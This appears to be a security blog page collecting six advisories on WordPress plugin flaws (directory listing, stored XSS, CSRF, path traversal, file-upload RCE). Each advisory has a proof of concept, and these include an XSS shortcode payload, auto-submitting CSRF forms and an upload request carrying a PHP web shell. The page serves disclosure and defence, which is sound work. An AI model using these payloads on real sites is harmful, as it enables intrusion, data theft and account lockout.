Category: Security

During testing, a critical vulnerability was discovered in the plugin, namely a vulnerability in the Directory Listings system, which allows an unauthorized user to view and download private files of other users. This vulnerability poses a serious security threat because it allows an attacker to gain access to confidential data and files of other users without their permission.

Main info:

CVE	CVE-2023-4933
Plugin	WP Job Openings
Critical	High
Publicly Published	September 25, 2023
Last Updated	September 25, 2023
Researcher	Dmtirii Ignatyev
OWASP TOP-10	A3: Sensitive Data Exposure
PoC	Yes
Exploit	Will be later
Reference	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4933 https://wpscan.com/vulnerability/882f6c36-44c6-4273-81cd-2eaaf5e81fa7
Plugin Security Certification by CleanTalk

Timeline

Discovery of the Vulnerability

While conducting a comprehensive security assessment of the WP Job Openings plugin, a critical vulnerability was identified in its Directory Listings system. This vulnerability allows unauthorized users to access and download private files belonging to other users. This security flaw is of utmost concern as it enables attackers to gain access to sensitive data and files without any authorization.

Understanding of Directory Listing attack’s

Directory Listing, in the context of web servers, refers to the practice of displaying the contents of a directory when an index file (like index.html or index.php) is absent. Without proper security measures in place, this can lead to unintended exposure of files and directories to anyone who accesses the directory through a web browser. For example, if an attachment directory doesn’t have an index file and the web server’s autoindex feature is enabled, it may display a list of files and directories to visitors.

Imagine a scenario where the WP Job Openings plugin stores attachments related to job applications in a directory without proper access controls or an index file. If an attacker knows or guesses the directory’s path, they can easily view and download attachments submitted by other users.

Exploiting the Directory Listing

Exploiting the Directory Listing vulnerability in WP Job Openings requires little technical skill. An attacker needs to:

• Identify the target directory where attachments are stored, often through educated guesses or publicly available information.
• Use a web browser to access the directory directly.
• If the directory listing is enabled and lacks proper access controls, the attacker can view and download files belonging to other users.

This straightforward process allows attackers to access private attachments and potentially expose sensitive information, such as resumes, cover letters, and personal details submitted by job applicants.

POC:

1. You can find directory listing inside this URL http://your_site/wordpress/wp-content/uploads/awsm-job-openings/2023/09/

Potential Risks and Real-World Impact

The potential risks associated with CVE-2023-4933 are substantial. An attacker could compromise the privacy and confidentiality of job applicants by accessing their personal documents. In addition, sensitive corporate data, including resumes, contact information, and internal job-related documents, may also be exposed.

In a real-world scenario, consider an attacker who accesses a directory storing job application attachments through the vulnerability in the WP Job Openings plugin. They may use the gathered information for malicious purposes, such as identity theft, spear-phishing, or selling sensitive data on the dark web. Furthermore, if the affected organization handles highly regulated data (e.g., personal health information or financial records), this exposure could lead to legal and compliance issues.

Recommendations for Improved Security

To mitigate the risk posed by CVE-2023-4933 and enhance the overall security of WordPress websites using the WP Job Openings plugin, the following recommendations should be followed:

1. Update the plugin: Website administrators should promptly update the WP Job Openings plugin to version 3.4.3 or later, which should include a patch to address this vulnerability.
2. Implement access controls: Developers should configure proper directory permissions and access controls to prevent unauthorized directory listings and file access.
3. Disable directory listing: Ensure that directory listing is disabled in the web server’s configuration, especially for directories containing sensitive data.
4. Security monitoring: Implement continuous security monitoring to detect and respond to potential vulnerabilities or attacks promptly.
5. Regular audits: Perform routine security audits and penetration testing to identify and address security weaknesses in WordPress plugins and themes.
   

By following these recommendations, website owners can significantly reduce the risk of sensitive data exposure through directory listings and enhance the overall security posture of their WordPress installations.

#WordPressSecurity #DirectoryListing #WebsiteSafety #StayProtected #HighVulnerability

Use CleanTalk solutions to improve the security of your website

Dmitrii i.

If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.

Check my website

In the process of testing the plugin, a vulnerability was found that allows you to implement Stored XSS on behalf of the contributor by embedding the shortcode in a new post, which entails account takeover

Main info:

CVE	CVE-2023-4289
Plugin	WP Matterport Shortcode
Critical	High
Publicly Published	September 25, 2023
Last Updated	September 25, 2023
Researcher	Dmtirii Ignatyev
OWASP TOP-10	A7: Cross-Site Scripting (XSS)
PoC	Yes
Exploit	Will be later
Reference	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4289 https://wpscan.com/vulnerability/38c337c6-048f-4009-aef8-29c18afa6fdc
Plugin Security Certification by CleanTalk

Timeline

Discovery of the Vulnerability

During the process of plugin testing, a vulnerability was uncovered in WP Matterport Shortcode. This vulnerability allows for the execution of Stored Cross-Site Scripting (XSS) attacks, carried out on behalf of a contributor-level user by embedding a malicious shortcode within a new post. This security flaw could potentially lead to account takeover and poses a significant threat to website security.

Understanding Cross-Site Scripting (XSS)

Stored Cross-Site Scripting (XSS) is a type of security vulnerability that occurs when an application does not properly validate user inputs and subsequently renders malicious scripts within a web page or application. In the context of this vulnerability, a contributor can inject harmful code via a shortcode that remains stored on the website server. When unsuspecting users view the compromised content, the malicious script is executed within their browsers, allowing attackers to steal sensitive information, impersonate users, or carry out other malicious actions.

Exploiting the Stored Cross-Site Scripting (XSS) vulnerability

Exploiting the Stored XSS vulnerability in WP Matterport Shortcode involves an attacker with contributor-level access inserting malicious code within a shortcode. This code could include payloads to steal user cookies, redirect users to malicious websites, or perform actions on behalf of the compromised contributor account. Attackers can craft convincing phishing attempts, compromising the security and trustworthiness of the affected website.

POC shortcode:

[matterport cols=”3″ src=”https://wordpress.org/plugins/shortcode-gallery-for-matterport-showcase/uKDy9xrMRCi,wV4vX743ATF” width=’900 ” onmouseover=”alert(12312123312)’]

This shortcode can be inserted into a new post

Potential Risks and Real-World Impact

The potential risks associated with this vulnerability are significant. An attacker could use the compromised contributor account to post malicious content or links, thereby damaging the reputation of the website. Furthermore, if the compromised contributor has higher privileges, the attacker may escalate their access to perform more malicious actions, such as deleting content or gaining administrative control.

In a real-world scenario, a contributor’s account could be taken over by an attacker who injects a rogue shortcode into a post. Unsuspecting visitors to the site may then fall victim to the XSS attack, leading to a breach of their personal data or exposure to harmful content.

1. Unauthorized Data Access:
   Attackers could exploit the XSS vulnerability to steal sensitive user data, such as login credentials or personal information.
   
2. Cookie Theft:
   Malicious scripts could hijack user cookies, leading to unauthorized access to user accounts or session hijacking. After account takeover attacker can insert malicious PHP code on page and it will be RCE.
   
3. Malicious Content Distribution:
   Attackers might use the vulnerability to inject harmful content or links into the website, potentially damaging the site’s reputation or spreading malware.

Recommendations for Improved Security

To mitigate the risks associated with this vulnerability and enhance overall security, the following measures are strongly advised:

• Update to the latest version:
  Website administrators should ensure that the WP Matterport Shortcode plugin is updated to the latest patched version, as the vendor may have already addressed this vulnerability.
  
• Input Validation and Escaping:
  Plugin developers must implement robust input validation and escaping mechanisms to ensure that all user-generated content, including shortcodes, is properly sanitized before rendering on the page.
  
• Regular Security Audits:
  Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
  
• User Privilege Restriction:
  Implement strict access controls to ensure that users can only access information that they are authorized to view based on their roles and permissions.
  
• User Awareness:
  Educate website administrators and users about the risks of sharing sensitive information and the importance of strong, unique passwords.
  
  

By following these recommendations, website owners can reduce the risk of XSS attacks and enhance the overall security posture of their WordPress installations.

Use CleanTalk solutions to improve the security of your website

Dmitrii i.

If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.

Check my website

During testing of the plugin, a CSRF vulnerability was discovered in action=rename, which can lead to denial of service and theft of the password from the database, thereby allowing an attacker to get inside the web application and gain a foothold in it. Replace any data in the database and do everything that an administrator can do. After logging into the database, he can create a new user and attach a hashed password to it. And through the administrator to implement RCE remote code execution

Main info:

CVE	CVE-2023-4827
Plugin	File Manager Pro
Critical	Very High
Publicly Published	September 12, 2023
Last Updated	September 12, 2023
Researcher	Dmtirii Ignatyev
OWASP TOP-10	A2: Broken Authentication and Session Management
PoC	Yes
Exploit	Will be later
Reference	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4827 https://wpscan.com/vulnerability/d4daf0e1-8018-448a-964c-427a355e005f
Plugin Security Certification by CleanTalk

Timeline

Discovery of the Vulnerability

In the ever-evolving landscape of web security, the discovery of vulnerabilities is a critical aspect of keeping online systems safe. Recently, a noteworthy vulnerability, identified as CVE-2023-4827, was uncovered in File Manager Pro, specifically in versions prior to 1.8. This vulnerability poses a significant risk to web applications utilizing this plugin.

The vulnerability was first identified during a routine security assessment of the File Manager Pro plugin. It was categorized as a Cross-Site Request Forgery (CSRF) vulnerability, which, when exploited, could lead to remote code execution (RCE) on the affected web application.

Understanding of CSRF attack’s

Before delving into the specifics of this vulnerability, it’s crucial to understand what CSRF is and how it operates. CSRF, or Cross-Site Request Forgery, is a type of attack where an attacker tricks a user into executing actions on a web application without their consent. Essentially, it involves the exploitation of a user’s authenticated session to perform actions without their knowledge.

To illustrate this, imagine a scenario where an authenticated user is tricked into clicking a seemingly innocent link on a malicious website. This link sends a request to a target web application where the user is logged in, executing actions as if they initiated them themselves.

Exploiting the CSRF

In the case of CVE-2023-4827, the vulnerability was discovered in the “action=rename” feature of File Manager Pro. This vulnerability allows an attacker to craft a malicious CSRF request that forces an authenticated user to rename a file. While this may seem relatively benign at first glance, it has the potential for devastating consequences.

By exploiting this CSRF vulnerability, an attacker can initiate a series of actions leading to a remote code execution (RCE) scenario. They can gain control over the web application, potentially extracting sensitive information from the database, altering data, or even creating new users with hashed passwords. The attacker can effectively assume the privileges of an administrator and manipulate the application as they see fit.

POC html code:

<html> 

  <body> 

  <script>history.pushState(”, ”, ‘/’)</script> 

    <form action=”http://127.0.0.1/wordpress/wp-admin/admin-ajax.php”> 

      <input type=”hidden” name=”action” value=”fs&#95;connector” /> 

      <input type=”hidden” name=”cmd” value=”rename” /> 

      <input type=”hidden” name=”name” value=”wp&#45;config&#46;txt” /> 

      <input type=”hidden” name=”target” value=”l1&#95;d3AtY29uZmlnLnBocA” /> 

      <input type=”submit” value=”Submit request” /> 

    </form> 

    <script> 

      document.forms[0].submit(); 

    </script> 

  </body> 

</html>

Potential Risks and Real-World Impact

The potential risks associated with this vulnerability are significant. In a real-world scenario, an attacker could use CSRF to exploit File Manager Pro, gain access to a web application’s database, and compromise its security. They could then exfiltrate sensitive data, modify critical settings, or inject malicious code, potentially causing data breaches or service disruptions. Moreover, the attacker could establish persistent access, allowing them to maintain control over the application, leading to long-term security concerns.

Recommendations for Improved Security

To mitigate the risk associated with CVE-2023-4827 and similar CSRF vulnerabilities, several security measures should be considered:

1. Update and Patch: It is crucial to keep all software, including plugins and themes, up to date. Developers often release patches to address security vulnerabilities.
2. CSRF Protection: Implement robust CSRF protection mechanisms, such as anti-CSRF tokens, to ensure that requests are only executed when initiated by legitimate users.
3. Security Audits: Regular security audits and penetration testing can help identify and address vulnerabilities before they can be exploited.
4. Least Privilege Principle: Restrict user privileges to the minimum required for their tasks to limit potential damage in the event of a breach.
   
   

In conclusion, CVE-2023-4827 serves as a stark reminder of the importance of maintaining vigilance in the ever-evolving landscape of cybersecurity. By understanding CSRF and taking proactive steps to secure web applications, developers and administrators can minimize the risks associated with such vulnerabilities and protect their systems from potential exploitation.

#WordPressSecurity #CSRF #WebsiteSafety #StayProtected #VeryHighVulnerability

Use CleanTalk solutions to improve the security of your website

Dmitrii i.

If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.

Check my website

During a security assessment of the FileOrganizer plugin, a medium vulnerability was uncovered in versions up to and including 1.0.2. This vulnerability allows an attacker to manipulate the plugin’s root folder, potentially compromising the security of the entire system. The plugin does not restrict functionality on multisite instances, allowing site admins to gain full control over the server.

Main info:

CVE	CVE-2023-3664
Plugin	FileOrganizer
Critical	Medium
Publicly Published	September 3, 2023
Last Updated	September 3, 2023
Researcher	Dmtirii Ignatyev
OWASP TOP-10	A5: Broken Access Control
PoC	Yes
Exploit	Will be later
Reference	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3664 https://wpscan.com/vulnerability/d59e6eac-3ebf-40e0-800c-8cbef345423f
Plugin Security Certification by CleanTalk

Timeline

Discovery of the Vulnerability

During testing, it was discovered that it is possible to change the root folder that the plugin will read and show information to the user. Usually in such plugins there is a restriction on exiting the /var/www/html directory, but in this plugin the root folder can be changed to any operating system directory like /home. And you can also perform the same actions using Path Traversal /var/www/html/../../../etc or /home and so on

Understanding of Path Traversal attack’s

Path Traversal is a type of vulnerability that occurs when an application allows users to navigate outside the intended directory structure. In the case of FileOrganizer, the plugin lacks proper validation, enabling an attacker to traverse directories beyond the expected boundaries.

For instance, if the plugin expects files to be within the /var/www/html directory, an attacker can use path traversal techniques to access directories like /home, /etc, or even ../../../../../, which could lead to unauthorized access to sensitive files and system resources.

Exploiting the Path Traversal

Exploiting this vulnerability involves crafting malicious requests that contain directory traversal sequences, such as “../” or “%2e%2e%2f”, to trick the plugin into accessing files and directories outside its intended scope. This allows the attacker to view, modify, or exfiltrate sensitive files.

POC:

1. Go to settings page of this plugin

2. Change directory to /home or you can use Path Traversal /var/www/html/../../../home or /var/www/html/wordpress/../../../../etc

3. Then navigate to the page of plugin

4. You will be able to list the files/folders outside of WordPress root directory

Potential Risks and Real-World Impact

The impact of this vulnerability is significant:

1. Unauthorized Data Access: Attackers can access and potentially steal sensitive files, including configuration files, user data, and other confidential information.
2. System Compromise: An attacker could use this vulnerability to compromise the entire system, execute arbitrary code, or manipulate critical files.
3. Data Loss: Files may be deleted, altered, or accessed without authorization, leading to data loss and system instability.

Recommendations for Improved Security

To mitigate the risks associated with CVE-2023-3664 and enhance the security of the FileOrganizer plugin, the following measures are strongly advised:

1. Regular Updates: Keeping software, applications, and plugins up to date helps patch known vulnerabilities that attackers could exploit for Path Traversal.
2. Input Validation: Implement thorough input validation and sanitization to prevent path traversal attacks and unauthorized file access.
3. Access Controls: Implement proper access controls to restrict file access based on user privileges.
4. Web Application Firewalls (WAFs) and Security Plugins: Implementing WAFs or Security Plugins can help detect and prevent Path Traversal attempts by filtering malicious inputs. You can use a very powerful and multifunctional Security & Malware scan by CleanTalk, which will protect your site from such attacks and your site will always be readable
   
   

By addressing the path traversal vulnerability in the FileOrganizer plugin and following these security recommendations, website owners can significantly reduce the likelihood of security breaches and protect the integrity of their data and systems.

#WordPressSecurity #PathTraversal #WebsiteSafety #StayProtected #MediumVulnerability

Use CleanTalk solutions to improve the security of your website

Dmitrii i.

If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.

Check my website

A severe security loophole has come to light in the Prevent files / folders access plugin, triggering concerns over the safety of WordPress websites. This vulnerability, tracked as CVE-2023-4238, opens the door to remote code execution through file uploads. Our testing revealed a startling scenario: an attacker can potentially upload a PHP file to the private directory at /wordpress/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory.

The plugin’s inclusion of a function for privilege elevation is noteworthy. If an attacker obtains < Admin privileges, they could exploit ordinary users to facilitate this unauthorized upload.

Main info:

CVE	CVE-2023-4238
Plugin	Prevent files / folders access
Critical	Very High
Publicly Published	August 31, 2023
Last Updated	August 31, 2023
Researcher	Dmtirii Ignatyev
OWASP TOP-10	A05: Security Misconfiguration
PoC	Yes
Exploit	Will be later
Reference	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4238 https://wpscan.com/vulnerability/53816136-4b1a-4b7d-b73b-08a90c2a638f
Plugin Security Certification by CleanTalk

Timeline

Discovery of the Vulnerability

During our meticulous examination of the plugin, we identified a critical flaw that exposes websites to remote code execution. This vulnerability allows an attacker to upload malicious PHP files to a specific directory, providing a gateway for executing arbitrary commands on the target system.

Understanding of Remote Code Execution attack’s

Remote Code Execution (RCE) is a sophisticated cyber attack that poses significant threats to the security of software applications, web servers, and online platforms. This type of attack enables malicious actors to execute arbitrary code on a target system, often leading to a complete compromise of the system’s functionality and data.

How Remote Code Execution Works:

1. Vulnerability Exploitation: RCE attacks typically exploit vulnerabilities in an application’s code, often resulting from poor input validation, inadequate user authentication, or insecure configurations. Attackers seek ways to inject their own malicious code into the target system.
2. Command Execution: Once the attacker succeeds in injecting malicious code, they can execute arbitrary commands on the target system. These commands might include shell commands, operating system functions, or other actions that can compromise the system’s security.
3. Unauthorized Access: RCE allows attackers to gain unauthorized access to the server environment, enabling them to manipulate files, databases, and other resources. This unauthorized access can result in data breaches, data loss, and unauthorized control of the system.

Exploiting the Remote Code Execution

In the context of the Prevent files / folders access plugin, an attacker can exploit the lack of proper validation and restrictions on file uploads. By injecting malicious PHP code into a file, they can upload it to the private directory. Upon execution, this file can trigger unauthorized commands, thereby compromising the entire web application.

POC:

1) Need to go to /wordpress/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory

2) Then upload a file with the php extension

3) Follow the link http://your_host/wordpress/wp-content/uploads/protectedfiles/{filename}.php

POC request:

POST /wordpress/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory HTTP/1.1

Host: your_host

User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://your_host/wordpress/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory

Content-Type: multipart/form-data; boundary=—————————1997636327839669212858654260

Content-Length: 748

Origin: http://your_host

Connection: close

Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1689481588%7Cyy6JhGzsFzCgNGZrPBtXmLggeJYWnERQGSgti68YGZK%7C778d0436fcf72095251ba6a1f0020fe28af9d706771d93c24bc4fdd5e96ab3c0; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1689481588%7Cyy6JhGzsFzCgNGZrPBtXmLggeJYWnERQGSgti68YGZK%7C5b4086f33c562500a9c62e1028af758fe8630a9991847cf93ff7a1265c9d9777; wp-settings-1=libraryContent%3Dbrowse%26siteorigin_panels_setting_tab%3Dwelcome; wp-settings-time-1=1689308788

Upgrade-Insecure-Requests: 1

Sec-Fetch-Dest: document

Sec-Fetch-Mode: navigate

Sec-Fetch-Site: same-origin

Sec-Fetch-User: ?1

—————————–1997636327839669212858654260

Content-Disposition: form-data; name=”mo_media_restriction_file_upload_field”

cff450153b

—————————–1997636327839669212858654260

Content-Disposition: form-data; name=”_wp_http_referer”

/wordpress/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory

—————————–1997636327839669212858654260

Content-Disposition: form-data; name=”fileToUpload”; filename=”cmd.php”

Content-Type: application/x-php

<?php system($_GET[‘cmd’]); ?>

—————————–1997636327839669212858654260

Content-Disposition: form-data; name=”option”

mo_media_restriction_file_upload

—————————–1997636327839669212858654260–

Potential Risks and Real-World Impact

The gravity of this vulnerability cannot be understated. An attacker who successfully leverages this RCE vulnerability gains the ability to execute operating system commands, potentially leading to the complete compromise of the web application, data theft, and unauthorized control of the server environment.

1. Data Breaches: Attackers can exfiltrate sensitive data from compromised systems. This might include personal information, financial data, proprietary business information, and more.
2. System Compromise: RCE attacks can lead to complete control of the target system. Attackers can modify files, install malware, and even escalate their privileges to gain control over the entire server.
3. Malicious Payload: Attackers can deliver payloads that create backdoors or install malware, allowing them to maintain persistent access to the compromised system even after the initial attack.

Recommendations for Improved Security

To mitigate the risks associated with CVE-2023-4238 and enhance overall security, we strongly recommend the following measures:

1. Regular Updates: Keeping software, applications, and plugins up to date helps patch known vulnerabilities that attackers could exploit for RCE.
2. Input Validation: Thoroughly validate and sanitize all user inputs to prevent injection attacks and unauthorized code execution.
3. Secure Coding Practices: Developers should follow secure coding practices, use proper input validation, avoid executing user-supplied code, and implement principle of least privilege.
4. Web Application Firewalls (WAFs) and Security Plugins: Implementing WAFs or Security Plugins can help detect and prevent RCE attempts by filtering malicious inputs. You can use a very powerful and multifunctional Security & Malware scan by CleanTalk, which will protect your site from such attacks and your site will always be readable
5. User Education: Educate users about the risks of executing code from untrusted sources and encourage them to avoid opening suspicious emails or downloading files from unknown sources.
   
   

By addressing the RCE vulnerability in the Prevent files / folders access plugin and following these security recommendations, website owners can significantly reduce the likelihood of security breaches and protect the integrity of their web applications.

#WordPressSecurity #RemoteCodeExecution #WebsiteSafety #StayProtected #VeryCriticalVulnerability

Use CleanTalk solutions to improve the security of your website

Dmitrii i.

If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.

Check my website

In the pursuit of robust website security, a profound vulnerability has emerged during the assessment of WordPress plugins. A striking vulnerability within the Lock User Account plugin was discovered, heralding a serious threat. This vulnerability exposes an avenue for malicious attackers to enact an untraceable lockout of all user accounts, capitalizing on a Cross-Site Request Forgery (CSRF) vulnerability.

Main info:

CVE	CVE-2023-4307
Plugin	Lock User Account
Critical	High
Publicly Published	August 21, 2023
Last Updated	August 21, 2023
Researcher	Dmtirii Ignatyev
OWASP TOP-10	A2: Broken Authentication and Session Management
PoC	Yes
Exploit	No
Reference	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4307 https://wpscan.com/vulnerability/06f7aa45-b5d0-4afb-95cc-8f1c82f6f8b3
Plugin Security Certification by CleanTalk

Timeline

Discovery of the Vulnerability

In the process of testing the plugin, which makes it possible to block the account of any user, a CSRF vulnerability was found, which allows the administrator to block all accounts when clicking on a malicious link. At the same time, the administrator will not know about it. There is no _wpnonce check in the plugin

Understanding of CSRF attack’s

Cybercriminals can craft a malicious link that, when clicked by an unwitting administrator, invokes unauthorized actions within the Lock User Account plugin. The impact is astounding – the attacker can swiftly lock all user accounts without the administrator’s knowledge. The lack of an essential _wpnonce check in the plugin facilitates this alarming exploit. CSRF – OWASP TOP-10

Exploiting the CSRF vulnerability

Administrators unknowingly executing the malicious link could inadvertently freeze every WordPress user’s account. The implications are severe, rendering the website inaccessible to users and disrupting the digital ecosystem.

POC html code:

<html>

  <body>

  <script>history.pushState(”, ”, ‘/’)</script>

    <form action=”http://your_site/wordpress/wp-admin/users.php”>

      <input type=”hidden” name=”s” value=”” />

      <input type=”hidden” name=”action” value=”lock” />

      <input type=”hidden” name=”new&#95;role” value=”” />

      <input type=”hidden” name=”paged” value=”1″ />

      <input type=”hidden” name=”users&#91;0&#93;” value=”1″ />

      <input type=”hidden” name=”users&#91;1&#93;” value=”2″ />

      <input type=”hidden” name=”users&#91;2&#93;” value=”3″ />

      <input type=”hidden” name=”users&#91;3&#93;” value=”4″ />

      <input type=”hidden” name=”action2″ value=”lock” />

      <input type=”hidden” name=”new&#95;role2″ value=”” />

      <input type=”submit” value=”Submit request” />

    </form>

    <script>

      document.forms[0].submit();

    </script>

  </body>

</html>

P.s. YOU CAN ADD ANY OTHER INPUT DATA WITH THE NAME=”USERS” AND THE VALUE=”YOUR_MAX_USERS_NUMBER”

Potential Risks and Real-World Impact

The CSRF vulnerability within the Lock User Account plugin introduces grave risks and potential scenarios:

1. Unauthorized Account Blocking:
   An attacker could craft a malicious link and trick the administrator into clicking on it unknowingly. This would lead to the administrator unintentionally blocking all user accounts on the website.
   
2. Mass Account Disruption:
   As all user accounts get blocked, it could lead to a mass disruption of user access to the website. This might cause significant inconvenience to users and damage the reputation of the website.
   
3. Denial of Service (DoS):
   By blocking all accounts, the website may effectively experience a DoS situation, preventing legitimate users from accessing their accounts and using the website’s services.

Recommendations for Improved Security

Safeguard your WordPress environment against CVE-2023-4019 and fortify your digital stronghold:

• Delete plugin:
  Since the plugin has been removed from the wordpress library, it is necessary to remove it. Current version will be vulnerable to this attack
  
• Implement _wpnonce Verification::
  Enhance the plugin’s defenses by incorporating robust _wpnonce verification. This step acts as a formidable barrier against CSRF attacks, thwarting unauthorized actions.
  
• Regular Security Audits:
  Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
  
• Educate Administrators:
  Educate administrators about the nature of CSRF attacks and the importance of cautious clicking. Raising awareness among your team can prevent inadvertent actions that could compromise site security.
  
  

By disseminating this crucial information throughout the WordPress community, we can collectively bolster the security of countless websites. Share this knowledge to ensure that administrators are well-equipped to defend against the CVE-2023-4307 vulnerability and to maintain the safety of their WordPress sites.

#WordPressSecurity #CSRFVulnerability #WebsiteProtection #StayInformed

Use CleanTalk solutions to improve the security of your website

Dmitrii i.

If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.

Check my website